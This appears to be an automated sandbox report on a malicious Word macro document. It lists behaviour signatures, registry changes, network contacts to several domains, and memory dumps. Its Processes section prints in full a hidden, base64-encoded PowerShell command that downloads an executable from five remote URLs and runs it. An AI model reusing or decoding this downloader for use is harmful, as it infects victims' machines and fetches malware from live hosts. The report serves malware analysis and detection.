Analysis Overview
SHA256
1ce640215c5dfbfe305436b07a2a63072fc67e9e1dc18377d03240397cc8d2d4
Threat Level: Known bad
The file 1ce640215c5dfbfe305436b07a2a63072fc67e9e1dc18377d03240397cc8d2d4 was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Suspicious Office macro
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Drops file in System32 directory
Drops file in Windows directory
System Location Discovery: System Language Discovery
Office loads VBA resources, possible macro or embedded object present
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Checks processor information in registry
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: AddClipboardFormatListener
Enumerates system info in registry
Modifies registry class
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-13 12:08
Signatures
Suspicious Office macro
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 12:08
Reported
2024-11-13 12:11
Platform
win7-20240903-en
Max time kernel
122s
Max time network
124s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Office loads VBA resources, possible macro or embedded object present
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\TypeLib\{DCF37437-FC45-400D-94A3-16CE3E357A27}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{DCF37437-FC45-400D-94A3-16CE3E357A27}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{DCF37437-FC45-400D-94A3-16CE3E357A27}\2.0\0\win32 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\TypeLib\{DCF37437-FC45-400D-94A3-16CE3E357A27}\2.0 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2648 wrote to memory of 2804 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\splwow64.exe |
| PID 2648 wrote to memory of 2804 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\splwow64.exe |
| PID 2648 wrote to memory of 2804 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\splwow64.exe |
| PID 2648 wrote to memory of 2804 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\splwow64.exe |
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1ce640215c5dfbfe305436b07a2a63072fc67e9e1dc18377d03240397cc8d2d4.doc"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -w hidden -en JABPAGYAaAByAGYAYgBwAHgAcQA9ACcASABnAGEAZgBnAGoAagB6ACcAOwAkAE8AYQB4AGwAdQBsAHYAeABsAHcAZABsACAAPQAgACcAOQA3ADMAJwA7ACQARgBwAGkAbQByAHgAYQBxAGUAPQAnAFEAYwB2AHcAbgBnAGoAZAByAGsAdwBsACcAOwAkAE0AdQBtAG0AaQB3AGQAdwByAGIAZQBmAGwAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAE8AYQB4AGwAdQBsAHYAeABsAHcAZABsACsAJwAuAGUAeABlACcAOwAkAFUAcgBmAG0AdABtAGoAdgBqAD0AJwBKAHMAawBzAHcAegB3AHAAbQBxAHkAawAnADsAJABIAGUAbwBtAGUAdwBsAHoAdgA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAAbgBFAFQALgBXAGUAQgBDAGwAaQBlAE4AVAA7ACQAVQBoAGkAdABkAG8AagBrAGMAPQAnAGgAdAB0AHAAOgAvAC8AagBvAGEAbwBsAGUAbwBiAGEAcgBiAGkAZQByAGkALgBhAGQAdgAuAGIAcgAvAHQAZQBzAHQALwBsADQAZAA2ADYAMwA4AHYANgBsAC0AZgBvAHQAbgB1ADUAbQAtADgANgA3ADAAMgA3ADIANwA4AC8AKgBoAHQAdABwADoALwAvAGsAYQBwAGwAYQBuAGYAbwByAGsAbABpAGYAdAAuAGMAbwBtAC8AdwBlAGIAXwBtAGEAcAAvAFAAbQBUAHUASQBFAFEALwAqAGgAdAB0AHAAOgAvAC8AbABvAG4AZABvAG4AdAByAGEAdgBlAGwALgBjAG8AbQAuAGEAcgAvAGIAcgBjAC8ASABzAEcAcAB1AFAAUgAvACoAaAB0AHQAcABzADoALwAvAGwAZQBhAHYAZQBuAHcAbwByAHQAaAByAGUAbgB0AGEAbAAuAGMAbwBtAC8AYwBhAGwAZQBuAGQAYQByAC8AYQBvAG8ALQB1AGUANwAtADYANQAzADcANAAwAC8AKgBoAHQAdABwADoALwAvAGwAYQByAGUAcwBlAHIAdgBhAC4AYwBvAG0ALgBwAHkALwBhAGwAbwBqAGEALwBBAE8ASQBTAHIAbwBKAG0AcQAvACcALgAiAFMAcABsAGAAaQB0ACIAKAAnACoAJwApADsAJABEAHEAdwB0AHUAaQBlAHYAaAB4AGYAdgBkAD0AJwBMAHUAcwB1AGUAZQBuAHkAawB1AGsAYQB2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABLAGMAcgBoAGsAcAB2AGsAcgB5AGYAYwBhACAAaQBuACAAJABVAGgAaQB0AGQAbwBqAGsAYwApAHsAdAByAHkAewAkAEgAZQBvAG0AZQB3AGwAegB2AC4AIgBkAGAAbwBXAG4AbABvAGAAQQBgAEQARgBpAGwAZQAiACgAJABLAGMAcgBoAGsAcAB2AGsAcgB5AGYAYwBhACwAIAAkAE0AdQBtAG0AaQB3AGQAdwByAGIAZQBmAGwAKQA7ACQAVwBoAHcAcQBxAHYAbgBjAG8AcwBvAD0AJwBOAG0AYgB3AGwAcQBiAHYAZgBwACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQATQB1AG0AbQBpAHcAZAB3AHIAYgBlAGYAbAApAC4AIgBMAGAARQBuAEcAVABIACIAIAAtAGcAZQAgADIANAAyADUAMAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAQQBgAFIAVAAiACgAJABNAHUAbQBtAGkAdwBkAHcAcgBiAGUAZgBsACkAOwAkAFIAbAB5AGoAaQBpAHYAcgBhAHgAegA9ACcAQwB5AHIAZABjAHEAcgBjAGwAeAB0AG8AJwA7AGIAcgBlAGEAawA7ACQAWQB0AHEAcwBxAHoAYQBlAGIAPQAnAEoAZgBzAHQAbQBvAGMAaQByACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEQAYgBtAHAAYQBuAGYAbgA9ACcAVABkAHcAeQBrAGYAaQBvAHQAeAB3AG4AJwA=
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | joaoleobarbieri.adv.br | udp |
| US | 8.8.8.8:53 | kaplanforklift.com | udp |
| TR | 78.135.106.243:80 | kaplanforklift.com | tcp |
| US | 8.8.8.8:53 | londontravel.com.ar | udp |
| US | 8.8.8.8:53 | leavenworthrental.com | udp |
| US | 192.249.119.99:443 | leavenworthrental.com | tcp |
| US | 192.249.119.99:443 | leavenworthrental.com | tcp |
| US | 8.8.8.8:53 | lareserva.com.py | udp |
| PY | 186.16.13.18:80 | lareserva.com.py | tcp |
| PY | 186.16.13.18:443 | lareserva.com.py | tcp |
| PY | 186.16.13.18:443 | lareserva.com.py | tcp |
Files
memory/2648-0-0x000000002FAB1000-0x000000002FAB2000-memory.dmp
memory/2648-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2648-2-0x00000000717BD000-0x00000000717C8000-memory.dmp
memory/2648-5-0x0000000006A70000-0x0000000006B70000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BC640621.wmf
| MD5 | 12fe67289b607a37306a01db2ec513b1 |
| SHA1 | a90427aaa66b04476c6ef58bd824b650a344215e |
| SHA256 | e0bd5af9d3324dbda3540d6048bedfcb33b8e2cbc5c903d7d994a10821c4ab48 |
| SHA512 | d6c6e83055de17c584f7abd02d2f9724d199fb135e93a0be7b565b442370b91b16bc7818abffa315b3656d48e1aba648d52cbe6adcd32eca62b3ec29ba0c1697 |
memory/2648-12-0x0000000000570000-0x0000000000670000-memory.dmp
memory/2648-13-0x0000000000570000-0x0000000000670000-memory.dmp
memory/2648-14-0x0000000000570000-0x0000000000670000-memory.dmp
memory/2648-15-0x0000000000570000-0x0000000000670000-memory.dmp
memory/2648-16-0x0000000000570000-0x0000000000670000-memory.dmp
memory/2648-22-0x0000000000570000-0x0000000000670000-memory.dmp
memory/2648-21-0x0000000006450000-0x0000000006550000-memory.dmp
memory/2648-25-0x0000000006450000-0x0000000006550000-memory.dmp
memory/2548-31-0x000000001B630000-0x000000001B912000-memory.dmp
memory/2548-32-0x0000000002990000-0x0000000002998000-memory.dmp
memory/2648-35-0x00000000717BD000-0x00000000717C8000-memory.dmp
memory/2648-36-0x0000000000570000-0x0000000000670000-memory.dmp
memory/2648-37-0x0000000006450000-0x0000000006550000-memory.dmp
memory/2648-38-0x0000000000570000-0x0000000000670000-memory.dmp
memory/2648-39-0x0000000006450000-0x0000000006550000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-13 12:08
Reported
2024-11-13 12:11
Platform
win10v2004-20241007-en
Max time kernel
133s
Max time network
142s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
